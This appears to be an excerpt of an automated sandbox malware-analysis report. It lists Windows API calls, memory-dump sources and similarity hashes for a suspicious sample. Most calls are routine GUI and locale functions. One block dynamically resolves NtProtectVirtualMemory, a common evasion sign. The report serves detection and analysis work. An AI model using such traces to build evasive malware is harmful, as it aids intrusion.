                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetThreadLocale.KERNEL32(?,00000000,032BBBE7,?,?,00000000), ref: 032BBB68
                                                                                                      • Part of subcall function 032BB8C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 032BB8E2
                                                                                                    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,032BBBE7,?,?,00000000), ref: 032BBB98
                                                                                                    • EnumCalendarInfoA.KERNEL32(Function_0000BA9C,00000000,00000000,00000004), ref: 032BBBA3
                                                                                                    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,032BBBE7,?,?,00000000), ref: 032BBBC1
                                                                                                    • EnumCalendarInfoA.KERNEL32(Function_0000BAD8,00000000,00000000,00000003), ref: 032BBBCC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Locale$InfoThread$CalendarEnum
                                                                                                    • String ID:
                                                                                                    • API String ID: 4102113445-0
                                                                                                    • Opcode ID: b5ee29caf2315a73ee6f7af838c0e6f6ed615ba079f22fff948149f910dd6af2
                                                                                                    • Instruction ID: e418cd351779f776edc297f0ac74435fdadfb62777ce1dd90c57e2705f2b13ab
                                                                                                    • Opcode Fuzzy Hash: b5ee29caf2315a73ee6f7af838c0e6f6ed615ba079f22fff948149f910dd6af2
                                                                                                    • Instruction Fuzzy Hash: AC01F239A30744AFEA11F6688C12FDEB67CDB45790F6105A0F810EAAC4D6A59E808264
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • UnhookWindowsHookEx.USER32(00000000), ref: 03302597
                                                                                                    • SetEvent.KERNEL32(00000000,03304DA2), ref: 033025B2
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 033025B7
                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,03304DA2), ref: 033025CC
                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,03304DA2), ref: 033025D7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 2429646606-0
                                                                                                    • Opcode ID: f7b54ec33de260c23a229388da062d0c5e9fea09b393e5765e30bb2b6acfa47d
                                                                                                    • Instruction ID: 0f60140daa128be1a78171b84cfce4eba3cf5370d7a1f2b8f01939b5ade15c99
                                                                                                    • Opcode Fuzzy Hash: f7b54ec33de260c23a229388da062d0c5e9fea09b393e5765e30bb2b6acfa47d
                                                                                                    • Instruction Fuzzy Hash: DCF045756103009BCBA8FBF8E8D8A9A77ECE708351F08C915B15ACB589D7B494C0CF55
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

APIs
• GetThreadLocale.KERNEL32(?,00000000,032BBDD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 032BBC2F
  • Part of subcall function 032BB8C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 032BB8E2
Strings
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: Locale$InfoThread
• String ID: eeee$ggg$yyyy
• API String ID: 4232894706-1253427255
• Opcode ID: 72070016afa254f1bbbe1066e1da8560694116bcd9d1dbadafd0382206d63beb
• Instruction ID: a70016df998bd33887235f8c2f44f2d529b3513cada0f99627e79f3e99a60e38
• Opcode Fuzzy Hash: 72070016afa254f1bbbe1066e1da8560694116bcd9d1dbadafd0382206d63beb
• Instruction Fuzzy Hash: 7F4126387342068BD711FA7AC8D12FEF2BADB813C0F580465D5A1CB356DBB8E9C58625
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 032E34FE
• SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 032E3550
• DrawMenuBar.USER32(00000000), ref: 032E355D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: Menu$InfoItem$Draw
• String ID: P
• API String ID: 3227129158-3110715001
• Opcode ID: 74305f8d64f08ea439394f36a7110a67afc74df5902c083808bb8c0521228476
• Instruction ID: 2d8f9541dee4ab67f55e4edb03719ad4e9a78d0e81b9c2a0cbd7ca4d32c88294
• Opcode Fuzzy Hash: 74305f8d64f08ea439394f36a7110a67afc74df5902c083808bb8c0521228476
• Instruction Fuzzy Hash: 42119174625301AFD311DB2CCC81B8ABAD9AF88365F588A68F1A5CB3D4D775C884C746
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 032CFC29
• GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 032CFC2F
Strings
• NtProtectVirtualMemory, xrefs: 032CFC1F
• C:\Windows\System32\ntdll.dll, xrefs: 032CFC24
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: C:\Windows\System32\ntdll.dll$NtProtectVirtualMemory
• API String ID: 1646373207-1386159242
• Opcode ID: c0e5f333a9f5ecddbc65b5ad4665f3aa71611e5da3e37fa546e596a18f3af927
• Instruction ID: 80f32928115158fdaf8d989e5c193cde5423419b4af9f1aaefc493fd0b05e42a
• Opcode Fuzzy Hash: c0e5f333a9f5ecddbc65b5ad4665f3aa71611e5da3e37fa546e596a18f3af927
• Instruction Fuzzy Hash: 80E0ECB6260349BFCB80EFACD985DCB3BFCAB1C760B004005BA19D7602C671E9919B71
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,?,0331910B,00000000,0331911E), ref: 032BD6A6
• GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 032BD6B7
Strings
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetDiskFreeSpaceExA$kernel32.dll
• API String ID: 1646373207-3712701948
• Opcode ID: 6d13459986519e6025936792f54e17b7a25b5a8c519d4d66310f915227ca42aa
• Instruction ID: 2b7301584b62a453f922d177980809db3147a61a0778524b264a9e34874685c3
• Opcode Fuzzy Hash: 6d13459986519e6025936792f54e17b7a25b5a8c519d4d66310f915227ca42aa
• Instruction Fuzzy Hash: 2CD052A023238A4FDA00FEA478C06C92AFCAB003A3F080525A41CAA20AC7F0C8C2C700
Uniqueness

Uniqueness Score: -1.00%

APIs
• MulDiv.KERNEL32(?,00000000,00000000), ref: 032ED6C3
• MulDiv.KERNEL32(?,?,?), ref: 032ED6FE
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4bf82abc7bfd78b7cf407fd1ca3a6fb92910d76b92e317fad021248613bc2848
• Instruction ID: eeeceff764ee7e387e107842f48edce11407f652de4495044f676cbb05c283d5
• Opcode Fuzzy Hash: 4bf82abc7bfd78b7cf407fd1ca3a6fb92910d76b92e317fad021248613bc2848
• Instruction Fuzzy Hash: A7D16A74A04A0ADFDB11CF79C484BAABBF6FF49300F548958E4AA9B354C771E981CB50
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetDesktopWindow.USER32 ref: 032E816D
• GetDesktopWindow.USER32 ref: 032E829D
• SetCursor.USER32(00000000), ref: 032E82F2
  • Part of subcall function 032F3C48: ImageList_EndDrag.COMCTL32(?,-00000010,032E82CD), ref: 032F3C64
• SetCursor.USER32(00000000), ref: 032E82DD
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: CursorDesktopWindow$DragImageList_
• String ID:
• API String ID: 617806055-0
• Opcode ID: ccb84be38efbd23f2fbf01f6d0d17f550798f3357e56ce7c6d3f617a51767382
• Instruction ID: 5af976f6c6da1246be9d8f65a5a60adaa809c66be6758b1a7de92e12537ae67d
• Opcode Fuzzy Hash: ccb84be38efbd23f2fbf01f6d0d17f550798f3357e56ce7c6d3f617a51767382
• Instruction Fuzzy Hash: 6C915838650641CFC708EF28E2C5A5AB7E9FB95700F48C594E896AB36DC770EC85CB51
Uniqueness

Uniqueness Score: -1.00%

APIs
• SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 032BF603
• SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 032BF61F
• SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 032BF696
• VariantClear.OLEAUT32(?), ref: 032BF6BF
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: ArraySafe$Bound$ClearIndexVariant
• String ID:
• API String ID: 920484758-0
• Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
• Instruction ID: 2c7318cfb23a341698aadd3802a4b2efd30d813eb843b592ba93f5efceb38066
• Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
• Instruction Fuzzy Hash: 1F41FA79A1171AAFCB61EF58CD90BC9B3BCAB08340F0441D5EA49E7211DA70AFC08F64
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualQuery.KERNEL32(?,?,0000001C), ref: 032BBE59
• GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 032BBE7D
• GetModuleFileNameA.KERNEL32(032B0000,?,00000105), ref: 032BBE98
• LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 032BBF2E
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: FileModuleName$LoadQueryStringVirtual
• String ID:
• API String ID: 3990497365-0
• Opcode ID: e45f37306e2736e36fd61dce08079ee1cca931017b2d7d80e1c5139dcc2f2c69
• Instruction ID: d391666d6ad76fda97e3896b760e8c7643be750eed368fe41221d24661a514c3
• Opcode Fuzzy Hash: e45f37306e2736e36fd61dce08079ee1cca931017b2d7d80e1c5139dcc2f2c69
• Instruction Fuzzy Hash: D0411E75A203589BDB21EB68CC84BDAB7FDAB18380F4440E9E508EB255D7B49FC48F50
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualQuery.KERNEL32(?,?,0000001C), ref: 032BBE59
• GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 032BBE7D
• GetModuleFileNameA.KERNEL32(032B0000,?,00000105), ref: 032BBE98
• LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 032BBF2E
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: FileModuleName$LoadQueryStringVirtual
• String ID:
• API String ID: 3990497365-0
• Opcode ID: 40d404f17392740e3f187c071d5243610341f93afebe17c0357a001cbe621a28
• Instruction ID: ce0955a5847051dbc0fc6a9dfbd32fd1d468aebe31c2c23212dd3711792502a4
• Opcode Fuzzy Hash: 40d404f17392740e3f187c071d5243610341f93afebe17c0357a001cbe621a28
• Instruction Fuzzy Hash: BF410E75A203589BDB21EB68CC84BDAB7FD9B18380F4440E9E648EB255D7B49FC48F50
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetKeyboardLayout.USER32(00000000), ref: 03301595
• GetDC.USER32(00000000), ref: 033015EA
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 033015F4
• ReleaseDC.USER32(00000000,00000000), ref: 033015FF
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: CapsDeviceKeyboardLayoutRelease
• String ID:
• API String ID: 3331096196-0
• Opcode ID: c5dfc0bf465cd0eb1a682daf3b5149ac52e2dd013a0625a89a988637131a29b4
• Instruction ID: 01140b28368e21d9cd405e06e03a6a8a071e94abe1769b29e88b7bb0ba36d9ba
• Opcode Fuzzy Hash: c5dfc0bf465cd0eb1a682daf3b5149ac52e2dd013a0625a89a988637131a29b4
• Instruction Fuzzy Hash: 61311B78A203418FC350EF2DE8C4B897BE0AB04354F4581A9E918CF396DA72A8888B54
Uniqueness

Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 032D2EA4: EnterCriticalSection.KERNEL32(033303A0,00000000,032D1856,00000000,032D18B5), ref: 032D2EAC
                                                                                                      • Part of subcall function 032D2EA4: LeaveCriticalSection.KERNEL32(033303A0,033303A0,00000000,032D1856,00000000,032D18B5), ref: 032D2EB9
                                                                                                      • Part of subcall function 032D2EA4: EnterCriticalSection.KERNEL32(00000038,033303A0,033303A0,00000000,032D1856,00000000,032D18B5), ref: 032D2EC2
                                                                                                      • Part of subcall function 032D6164: GetDC.USER32(00000000), ref: 032D61BA
                                                                                                      • Part of subcall function 032D6164: GetDeviceCaps.GDI32(00000000,0000000C), ref: 032D61CF
                                                                                                      • Part of subcall function 032D6164: GetDeviceCaps.GDI32(00000000,0000000E), ref: 032D61D9
                                                                                                      • Part of subcall function 032D6164: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,032D4D27,00000000,032D4DB3), ref: 032D61FD
                                                                                                      • Part of subcall function 032D6164: ReleaseDC.USER32(00000000,00000000), ref: 032D6208
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 032D4D29
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 032D4D42
                                                                                                    • SelectPalette.GDI32(00000000,?,000000FF), ref: 032D4D6B
                                                                                                    • RealizePalette.GDI32(00000000), ref: 032D4D77
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                     • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                     • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalPaletteSection$CapsCreateDeviceEnterSelect$CompatibleHalftoneLeaveObjectRealizeRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 979337279-0
                                                                                                    • Opcode ID: 541a7faedb366d2d7d279f77699589103b85686cdf4311b556dac4f4c7626d03
                                                                                                    • Instruction ID: a8e0c1b094afa86368073c92ea560c594e39e0643a5d8fd078ea59f24f2fdeaa
                                                                                                    • Opcode Fuzzy Hash: 541a7faedb366d2d7d279f77699589103b85686cdf4311b556dac4f4c7626d03
                                                                                                    • Instruction Fuzzy Hash: 2D310878A24658EFDB04EF59C980D9DB7F5FF48720B6641A1E804AB325CB70EE80DB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetMenuState.USER32(?,?,?), ref: 032E3B97
                                                                                                    • GetSubMenu.USER32(?,?), ref: 032E3BA2
                                                                                                    • GetMenuItemID.USER32(?,?), ref: 032E3BBB
                                                                                                    • GetMenuStringA.USER32(?,?,?,?,?), ref: 032E3C0E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                     • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                     • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$ItemStateString
                                                                                                    • String ID:
                                                                                                    • API String ID: 306270399-0
                                                                                                    • Opcode ID: 54f3821aab6b08e110c834414f742b6a46e56fe4077df6f6e249ed6f5472aa0a
                                                                                                    • Instruction ID: 2d26909e68c0a2c56f5fce9f620d4bc0ede7b652c7a03573f92e480937eab570
                                                                                                    • Opcode Fuzzy Hash: 54f3821aab6b08e110c834414f742b6a46e56fe4077df6f6e249ed6f5472aa0a
                                                                                                    • Instruction Fuzzy Hash: B8118439720214AFC710EE2CCC85DEF77F89F492A1F54486AF909DB250D670DD8187A0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 032CD6EF
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 032CD6FE
                                                                                                    • EnterCriticalSection.KERNEL32(033302EC), ref: 032CD743
                                                                                                    • InterlockedExchange.KERNEL32(0331AAF0,?), ref: 032CD75F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                     • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                     • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentThread$CriticalEnterExchangeInterlockedSection
                                                                                                    • String ID:
                                                                                                    • API String ID: 2380408948-0
                                                                                                    • Opcode ID: 18b8beb9f202dfdfb5b0ea3c3c1d66dc393e892b43f6cf232f09f378b69b60e6
                                                                                                    • Instruction ID: e9f8b363a2075080c48894bac15f27020f9d440df6de176bea7f5a73e80a4076
                                                                                                    • Opcode Fuzzy Hash: 18b8beb9f202dfdfb5b0ea3c3c1d66dc393e892b43f6cf232f09f378b69b60e6
                                                                                                    • Instruction Fuzzy Hash: DA21D134A74785EFDB10EBA8DC80BADB7F8EB05700F548678E400DA651D3B598C5CB21
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • EnumWindows.USER32(Function_00052CBC), ref: 03302D61
                                                                                                    • GetWindow.USER32(00000003,00000003), ref: 03302D79
                                                                                                    • GetWindowLongA.USER32(00000000,000000EC), ref: 03302D86
                                                                                                    • SetWindowPos.USER32(00000000,00000213,00000000,00000000,00000000,00000000,00000213,00000000,000000EC,00000003,00000003), ref: 03302DC5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                     • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                     • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$EnumLongWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 4191631535-0
                                                                                                    • Opcode ID: 4eaef4601a1a7476d1c3c23a12568ddfa295e88cf29c78d221f366f3fe3f352c
                                                                                                    • Instruction ID: eb0b310e061443f24a59ecd18200ec933c9d237eb7ffcb560e8f602a9ed5c6f7
                                                                                                    • Opcode Fuzzy Hash: 4eaef4601a1a7476d1c3c23a12568ddfa295e88cf29c78d221f366f3fe3f352c
                                                                                                    • Instruction Fuzzy Hash: 321121356147109FD710EA2CCCD9F9677E8AB45760F190565F968DF2D2C3B09C80C791
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                     • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                     • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0e489b3884acf2b4faaf48379fb414c14731e3bcd665f9d5c20ec7a8234df375
                                                                                                    • Instruction ID: e8994e1a24675d1da16c20db9756f44562cd307329d59320d6e973f69570dae3
                                                                                                    • Opcode Fuzzy Hash: 0e489b3884acf2b4faaf48379fb414c14731e3bcd665f9d5c20ec7a8234df375
                                                                                                    • Instruction Fuzzy Hash: 08014B283143482BC774FD6A9D85F6B7A6DDFC1B51F48443878299F702EAA5DC80C3A4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 032E7F4D
                                                                                                    • GetCurrentProcessId.KERNEL32(00000000,?,?,-00000010,00000000,032E7FB8,-000000F7,?,00000000,032E7B72,?,-00000010,?), ref: 032E7F56
                                                                                                    • GlobalFindAtomA.KERNEL32(00000000), ref: 032E7F6B
                                                                                                    • GetPropA.USER32(00000000,00000000), ref: 032E7F82
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                     • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                     • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2582817389-0
                                                                                                    • Opcode ID: 972ccb658ab247196085dead253b36b4e3ee5e8e0989c54c007d78302ca64f47
                                                                                                    • Instruction ID: 784031b48577c105544d2cc885ae3379a8c8cce1fdfaad416a0dab7fa4d943ab
                                                                                                    • Opcode Fuzzy Hash: 972ccb658ab247196085dead253b36b4e3ee5e8e0989c54c007d78302ca64f47
                                                                                                    • Instruction Fuzzy Hash: B0F0E5192727235BEA20FBFD5D828BF62ACDE40790B888461FC01CA018E755CCC1C1B2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetWindowThreadProcessId.USER32(?), ref: 032E6FED
                                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,?,032E3C51,?,032E2D0D), ref: 032E6FF6
                                                                                                    • GlobalFindAtomA.KERNEL32(00000000), ref: 032E700B
                                                                                                    • GetPropA.USER32(?,00000000), ref: 032E7022
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
